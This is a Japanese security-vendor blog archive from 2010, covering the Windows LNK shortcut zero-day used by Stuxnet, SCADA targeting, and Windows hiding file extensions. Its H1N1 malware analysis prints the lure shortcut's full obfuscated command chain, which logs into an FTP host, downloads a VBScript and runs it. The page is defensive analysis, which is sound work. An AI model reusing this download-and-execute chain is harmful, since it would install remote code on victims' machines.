  「セキュリティ アドバイザリ(2286198)」に関してだが、いくつか我々には不明瞭に思われる部分がある。

  たとえば、同アドバイザリによれば:

  「同脆弱性は、ユーザが特別に作成されたショートカットのアイコンをクリックすると、悪意あるコードが実行されるかもしれない方法で、Windowsがショートカットをパースすることが原因だ。」

  しかし、我々の分析によれば、クリックは必要ではないのだ。

  Microsoft自身のMalware Protection Centerは、同エクスプロイトについて以下のように述べている:

  「これは、USBドライブに置かれた、特別に作成されたショートカットファイル(別名.lnkファイル)を活用するもので、.lnkファイルがオペレーティングシステムによって読まれるとすぐに、自動的にマルウェアを実行する。言い換えると、単にショートカットアイコン(Windows Explorerのような)を表示するアプリケーションを使用しているリムーバブルメディアドライブを閲覧することで、その他のユーザインタラクション無しでマルウェアが動作する。」

  単にリムーバブルドライブを閲覧するだけ。クリックは必要無い。

  そして、AutoPlay機能に関する疑問がある。アドバイザリによれば:

  「AutoPlayを無効にしたシステムについては、同脆弱性を悪用するには、ユーザがリムーバブルディスクのルートフォルダを、手動で閲覧する必要がある。Windows 7システムについては、リムーバブルディスクのオートプレイ機能は、自動的に無効となる。」

  しかしデフォルトでは、我々のWindows 7テストシステムにUSBドライブを接続すると、以下のような状態になる:

Windows 7 AutoPlay

  このダイアログはAutoPlayとなっているのでは? Windows 7システムでは、AutoPlayは自動的に無効とはならないようだ。

  デフォルトでAutoRunは無効とならなければならなかったのだろうか?(Windows 7は間違いなく、Windowsの以前のバージョンよりもリムーバブルメディアの取り扱いが優れているが、AutoPlayは現在もデフォルト機能であるようだ。)

  いずれにせよ、AutoPlayを無効にしておいても、この脆弱性を大して緩和することにはならない。それは単に:スタートをクリック、コンピュータをクリック、リムーバブルディスクをクリック。3回のクリックで危険にさらされるのだ。しかしそれでも、Windows 7のソーシャルエンジニアリングトリックを制限するためには、組織はAutoPlay機能を無効にした方が良い。

  通常、我々はMicrosoftに対してこのような小さな点をあげつらったりはしないのだが、組織にリスクのオフィシャルな評価情報を提供するアドバイザリであるため、このことは特に重要であると思う。

追記:Microsoftがアドバイザリをアップデートした。我々の最新の記事に詳細がある

ついに標的に狙われたSCADAシステム

  先週よりWindowsのLNKショートカットファイルを使用する新たなゼロディ・エクスプロイットが、標的型攻撃に使われると懸念されています。しかし今回重要なことは、このエクスプロイットがSCADAシステムのWindows上で動くマネジメントアプリケーションをターゲットにしている点です。F-SecureのSean Sullivanのポスト  「スパイ攻撃がLNKショートカットファイルを使用」「LNKエクスプロイトに関するその後の分析」 でもこれについて少し触れられています。

  SCADAとは、工場のオートメーションなどに使われる、機器制御とモニタリングのデータ収集とを行うための取り付けモジュール型コンピューター装置のことですが、これらは工場だけでなく電力網、ガス供給、水道、石油パイプラインなど重要インフラでも大規模に使用されています。

  私は6年ほど前に重要インフラ保護関連の調査のため、サンディア研究所などアメリカ数カ所でヒアリングのために回ったことがありますが、SCADAのセキュリティはその時すでに重要な課題になっていました。その時期アメリカでは東海岸での大規模停電を経験した直後だったため、そこから検討して電力グリッドなどに使われるSCADAシステムが攻撃された場合にも大規模な電力障害が起きうると想定されていました。

  Robert McMillanによるNewYork Timesに掲載された記事 「New Virus Targets Industrial Secrets」 では、この点についてさらに掘り下げていますが、今回のLNKファイル・エクスプロイットでは、Siemens社のSCADAマネジメント・ソフトウェアの「Simatic WinCC」のみが狙われる仕組みである事が判明しているそうです。このエクスプロイットはUSBデバイスに潜み、WindowsOSのPCに挿し込まれるとまずスキャンを開始、他のUSBデバイスを探して自身をコピーしようとするか、またはSiemensのWinCCソフトウェアを発見するとデフォルトパスワードでログインしようとします。そのためSiemens社は先週金曜にはすでに顧客に対してアラートを出しているそうです。

  NYTimes記事中で、Mississippi州立大学の研究者Wesley McGrewによると、このエクスプロイット作成者がもしもっと広範囲な悪用を狙うなら、もっと普及しているSCADAマネジメント・システムのWonderwareやRSLogixを試しただろうと発言しています。今回のエクスプロイットは、SCADAを乗っ取って人質にし身代金要求するためかもしれない、という観測もあります。

  SCADAのコンピューターは、未だに1980年代の8bitや16bitのCPUのOSなど搭載しないコンピューターの世界と近いものがあり、最近流行のArduino程度の性能かそれ以下のものも多いでしょう。また使用される場所も人里離れた山奥などもあり、一度設置されると何年あるいは何十年も壊れない限り使われる可能性がありますから、ソフトウェアのアップデートも行われないで放置され得ます。またパスワードなども変更される前提になっていないことから、デバイスにハードコードされている場合もあります。

  しかし、1990年代にはSCADAの世界にもネットワーク化の波が押し寄せたために、階上階を重ねるようにTCP/IPが追加されてきました。そのため、メーカーによってはPCの世界では考えられないようなインプリメントをした場合があったようで、以前アメリカで聞いた話でも、TCP/IPのポート番号を直接制御コマンドに割り当てられたSCADAが使われた工業用ロボットがあり、セキュリティ・テストのためにポートスキャンをかけただけで、いきなりトンデモない動作を始めた例があったそうです。

  また、低速CPUでRAMも限定量しか搭載されていないコンピューターでありOSすら走っていないとしたら、ファイアーウォールやフィルタリングなどのベーシックなセキュリティ機能が入る余裕もないといえます。TCP/IP通信もむき出しのパケットが流れているため、アメリカ商務省下の国立標準技術局(NIST)ではSCADAモジュールにアドオンするためのAES暗号通信モジュールを研究していました。

  従来から、サイバー戦やサイバーテロリズムの危惧からSCADAのセキュリティについて指摘が出されて来ていましたが、今回明らかにSCADAをターゲットにしたエクスプロイットが登場したことで、現実の問題として認識する必要があります。今回の問題を指摘したのがベラルーシのアンチウィルス企業だったことは、地理的な要素から見たら偶然ではないでしょう。重要インフラのSCADAに対する攻撃が成功した場合は、国としてのインフラ機能を奪うことができます。日本でもSCADAは各方面で使われています。輸入品よりは日本の電機メーカーのものが多く使用されていると云われていますが、将来に備えて警戒が必要な分野と言えると思います。

Windows Shellのゼロデイ脆弱性

  Microsoftが「セキュリティ アドバイザリ(2286198)」をリリースし、現在Stuxnetルートキットにより悪用されているLNKショートカット(Windows Shell)脆弱性に関する詳細を提供している。

  このニュースは良く無いものだ。

  Windows Shell脆弱性はUSBデバイスのほか、WindowsファイルシェアおよびWebDavを通じても悪用される可能性がある。

  Windowsの全バージョンが影響を受ける:

Microsoft Advisory 2286198

  脆弱なバージョンには、最近のサポート終了によりアドバイザリにリストされていないWindows XP Service Pack 2も含まれる。

  SP2用のパッチが無いならば、ユーザは提案されている回避方法を実行する必要があるだろう:

  •  ショートカット用アイコンの表示を無効にする
  •  WebClient サービスを無効にする

  詳細はMicrosoftのセキュリティ アドバイザリを参照して欲しい。

LNKエクスプロイトに関するその後の分析

  Windowsショートカットに存在する、これまで知られていなかった欠点を利用することでUSBストレージデバイスを介して広がる、新たな脅威が登場した。

  我々は同ショートカットLNKエクスプロイトの検出を「Exploit:W32/WormLink.A」として追加した。このケースで使用されるショートカットファイルは4.1KBだ。Trojan-Dropper、バックドア、ルートキットと結びついたファイルは、Stuxnetファミリとして検出される。

  我々は昨日、2つの興味深い点に言及した。同ルートキットが署名されているという点、SCADAシステムを標的としているという点だ。

  同ルートキットコンポーネントは、デジタル署名されており、我々は有効なRealtek Semiconductor社のシグネチャが使用されていることを確認した。Trojan-Dropper自身は、デジタル署名をコピーしようとするだけなのに対して、ドロップされるドライバは適切に署名されている。

  いずれにせよ、有効ではあっても証明書は6月に失効している。「H Security」が同証明書のスクリーンショットを掲載している。

  有効なデジタル署名を用いた悪意あるソフトウェアについては、エフセキュアのJarno Niemelaが先頃、「Caro 2010 Workshop」のプレゼンテーションで予測していた:署名されているのだからクリーンでしょう?

  標的にされているSCADAシステムに関して、Siemens SIMATIC WinCCデータベースは、エンドユーザが変更しないように言われるハードコードされた管理ユーザー名とパスワードの組合せを使用しているようだ。

  したがって、この標的型攻撃により障害が起きた組織は、データベースのセキュリティ侵害に対して完全に脆弱である可能性がある。Slashdotのコメントに付加的な詳細が掲載されている

  我々は今後も同ケースについて進展があり次第、詳細を報告する予定だ。

スパイ攻撃がLNKショートカットファイルを使用

  標的型攻撃で使用されている、新たなゼロデイの可能性が流布している。ベラルーシのアンチウイルス会社「VirusBlokAda」がこのほど、2つの新しいルートキット・サンプルに関するニュースを発表した。そして非常に興味深い事に、感染ベクタはUSBストレージとWindowsショートカット[.LNK]ファイルだ。

  このルートキットは、Windows ExplorerやTotal Commanderなど、アイコンを生成するファイルエクスプローラにより閲覧された際に、オペレーティングシステムに感染するLNKファイルを使用する。

  「Krebs on Security」によれば、このメソッドは完全にパッチを当てたWindows 7コンピュータを感染させることができる。

  Krebsによれば:MicrosoftのJerry Bryantが述べている。「MicrosoftはUSBストレージデバイスにより広がっているというマルウェアに関する主張について調査中だ。調査を完了した時点で、我々はユーザとインターネット環境を保護するため、適切な行動を取る予定だ。」

  同サンプルに関する我々の現時点での分析は、このショートカットはWindowsがコントロールパネル・ショートカットファイルを取り扱う方法を、どのようにか利用しているように思われるというものだ。

Windows 7 Control Panel Icons

  我々は調査を続けている。

  Krebsの報告で、興味深い点がさらに2つある:

1.) これはRealtek Semiconductor社のデジタル署名を使用するか、模倣しようとする。
2.) Siemens WinCC SCADAシステム、もしくは製造業や発電所などの大規模な分散システムのオペレーションをコントロールするマシンを標的とするようだ。

  「VirusBlokAda」によるレポートはここにある。(PDF)

  多くの組織が、ワームのオートランに関し、USBデバイス向けのポリシーを、かなり以前に確立している。今回の新しいスパイ攻撃は、新たな見直しの必要性を示唆している。ポリシーによりAutoRun/AutoPlayをオフにすることは、もはや安全を保障するものではない。

H1N1ショートカット・マルウェア

  我々は「H1N1」新型インフルエンザをエサにした、新たなマルウェアと遭遇した。

  これはショートカット・ファイルで、.LNKに名称変更されたWindows EXE実行ファイルではなく、実際のリンクファイルだ。

  以下が、このファイルの外観だ(md5: d17e956522f83995654666c0f2343797)。

h1n1

  コマンドプロンプトからこのファイルを見ると、1987バイトの無害なショートカットに見える。

h1n1

  しかしコンテンツを見ると、何だかおかしな様子なのが分かるだろう:

h1n1

  このショートカットのプロパティを見てみよう:

h1n1

  これは「%ComSpec%」にリンクしているのだろうか? あまり良い感じはしない。このショートカットのリンク先をコピー&ペーストしてみよう:

h1n1

  よく分からない。

  では、何をしているかを見るため、これをより小さな部分に分割してみよう:

     %ComSpec% /c                         // Executes command prompt to run the next commands
     set h=p -                            // sets variable "h" as "p ?"
     set j=ge                             // Sets variable "j" as "ge"
     set s=.g03z.                         // sets variable "s" as ".g03z."
     echo echo o www%s%com^>t>b.bat       // writes "echo o www%s%com>t" to b.bat - that's "www.g03z.com"
     call b.bat                           // calls the newly created b.bat
     echo aa33>>t                         // writes "aa33" to file called t
     echo bb33>>t                         // writes "bb33" to file called t
     echo echo %j%t p p.vbs^>^>t>>c       // writes "echo %j%t p p.vbs>>t" to file called c - that's "get"
     echo echo bye^>^>t>>c                // writes "echo bye>>t" to file called c
     echo ft%h%s:t>>c                     // writes "ft%h%s:t" to file called c - that's "ftp"
     echo start p.vbs>>c                  // writes "start p.vbs" to file called c
     ren c h.bat                          // renames c to h.bat
     call h.bat                           // calls h.bat

  このショートカットをクリックすると、結果として、あなたのマシンは以下のことをすることになる:

  • 「www.g03z.com」という名称のFTPサイトに接続
  • ユーザー名「aa33」、パスワード「bb33」でログイン
  • 「p.vbs」という名称のスクリプトをダウンロード
  • スクリプトを実行


  では、「g03z.com」のオーナーは誰だろう? なるほど、ミスター「Zzzzggg」というわけだ:

h1n1

  同ドメインはまだ存在するが、ファイル「p.vbs」は現在サーバに見あたらない。よって現状では何ごとも起こらない。

  エフセキュアの製品はこの悪意あるショートカットを検出し、ブロックしている。

Q&A:Windows 7におけるファイル拡張子を隠す問題について

  Windows 7についてこのブログに掲載した記事に対し、好意的なコメントを多数頂いた。中にはMicrosoftのExplorer開発チームで働いている人たちからのフィードバックもあった。

  多くのコメントに、このトピックに関する質問が含まれていたので、以下にQ&Aをまとめた:

Q:一体これはどういうことなのか?
A:Windowsでは、デフォルトでEXEのようなファイル拡張子を隠す設定となっていることが問題になっている。ウィルスライターたちは二重拡張子(PICTURE.JPG.EXE)を持つ悪意あるファイルを作成することで、この問題を悪用する。このようなファイルでは、誤解を招くようなアイコンが使用されるているケースも非常に多い。

Q:Windows Explorerはいつから「既知のファイルタイプ」のファイル拡張子を表示していないのか?
A:Windows NTからだ。

Q:どうしてこのような仕様にしているのか?
A:我々には分からない。

Q:これは本当にリスクなのか? ユーザーがハードドライブにこのようなファイルを既に持っている場合、もう遅いのでは?
A:そうでもない。このファイルはインターネットやファイル共有、あるいはリムーバブル・ドライブにより侵入する可能性があり、ユーザーがそのファイルを実行しているとは限らないからだ。

Q:でも、もしそのファイルがインターネット経由で侵入したのなら、Explorerが「信頼できないゾーン」からのものだと警告するはずだ!
A:それはウェブをブラウズするのにInternet Explorerを、電子メールの添付書類をダウンロードするのにOutlookを使用している場合のみだ。しかしネットからファイルをダウンロードする方法は山のようにある:サードパーティのウェブおよび電子メールクライアント、BitTorrent、その他のP2Pクライアント、チャットプログラム等など。また、そのファイルがネットワークシェアもしくはUSBドライブ上にある場合は、そのような警告ダイアログをあてにすることはできない。

Sucks

Q:問題ない。あなた方のスクリーンショットでも、Explorerがファイルに「アプリケーション」と表示されている! だから誰もクリックしたりしないだろう。たとえファイルが、何とか.txtという名称でも。テキストファイルのアイコンだったとしても。
A:確かに…

Q:本物のワームは本当にそんなファイル名を使用しているのか?
A:もちろん。こうしたファイルは、リムーバブル・ドライブまたはネットワークシェア上のランダムなフォルダに、以下のようなファイル名で自身をコピーすることで広まるのが一般的だ:

    E:\PRESENTATION.PPT.exe
    E:\DOCUMENT.DOC.exe
    E:\PORNVIDEO.AVI.exe
    Etc.

  多くの人がこれらをクリックする可能性がある。特にファイルのアイコンがドキュメントアイコンの場合は──またWindowsがファイル名の「.exe」部分を隠している場合には。

Q:それでは、Explorerの設定で「既知のファイルタイプの拡張子を隠す」をオフにするのがソリューションなのか?
A:そうだ。

Windows 7 Folder Options

Q:そうすると、すべてのファイル拡張子が表示されるのか?
A:いや、そうではない。このオプションをオフにしても、まだ隠されたままの実行可能な拡張子もある。

Q:それは何?
A:たとえばPIFがそうだ。このファイルタイプは古いMS-DOSプログラムへのショートカットとなるよう意図されている。問題は、新しいWindows実行ファイルすべてを.PIFに名称変更することは誰でもでき、ダブルクリックすれば間違いなく実行されるということだ。

  たとえば、Scamoワームはまさにこのフローを利用して、以下のようなファイルを仕込む:

    HARRY POTTER 1-6 BOOK.TXT.pif
    ANTHRAX.DOC.pif
    RINGTONES.MP3.pif
    BRITNEY SPEARS FULL ALBUM.MP3.pif
    EMINEM BLOWJOB.JPG.pif
    VISTA REVIEW.DOC.pif
    OSAMA BIN LADEN.MPG.pif
    NOSTRADAMUS.DOC.pif

Q:それでは、PIFファイルを見えるようにするにはどうしたら良いのか?
A:「NeverShowExt」という名のレジストリキーを介してだ。Microsoft Knowledgebaseの記事にリンクしたかったのだが… 見つけることができなかった。だが、GeoCitiesのこのページに、2、3年前に愛好家によって作成された、このトピックに関する記載がある。おそらくこの件に関しては、これが最良の情報源だろう。

Q:あなた方はまだ、MicrosoftがWindows 7でExplorerのふるまいを変更することを期待しているのか?
A:いや、そうでもない。

結論:我々は今も、どうしてWindowsがファイル名の最後の拡張子を何が何でも隠そうとするのか、理解できずにいる。間違いの元なのに。

バックナンバー
セキュリティ関連リンク
セキュリティ機関

政府関連

セキュリティ関連団体

研究機関・大学
詳細カテゴリ
メディア関係者の皆様へ
エフセキュアブログメンバー
エフセキュアブログメンバー
ミッコ・ヒッポネン
エフセキュア CRO(セキュリティ研究所主席研究員)(ヘルシンキ)
(Twitterアカウント)
(研究所Twitter)
ショーン・サリバン
エフセキュア セキュリティ・アドバイザー(ヘルシンキ)
(Twitterアカウント)
高間 剛典
メタ・アソシエイツ代表
(公式ブログ)
(Twitterアカウント)
星澤 裕二
株式会社セキュアブレイン 最高技術責任者
(公式ブログ)
(人物紹介)
岩井 博樹
デロイト トーマツ リスクサービス株式会社 (〜2013年3月 株式会社ラック) 情報セキュリティ大学院大学 客員研究員
(Twitterアカウント)

(人物紹介)
福森 大喜
株式会社サイバーディフェンス研究所 上級分析官
CDI-CIRTメンバー
(人物紹介)
鵜飼 裕司
株式会社FFRI 代表取締役社長
(人物紹介)
福本 佳成
楽天株式会社
執行役員
OWASP Japan
アドバイザリーボード
Rakuten-CERT representative
(人物紹介)
神田 貴雅
エフセキュア株式会社 プロダクトグループ 部長
富安 洋介
エフセキュア株式会社 プロダクトグループ
コーポレートセールスチーム
エフセキュア株式会社
(エフセキュアブログ公式Twitterアカウント)

海外記事翻訳
株式会社イメージズ・アンド・ワーズ
エフセキュアメールマガジン

ブログに載らないメルマガ限定情報や、技術者インタビュー、製品情報、技術解説を掲載して毎月一回配信します。アドレスのみの登録で購読無料。

エフセキュアブログQRコード
QRコード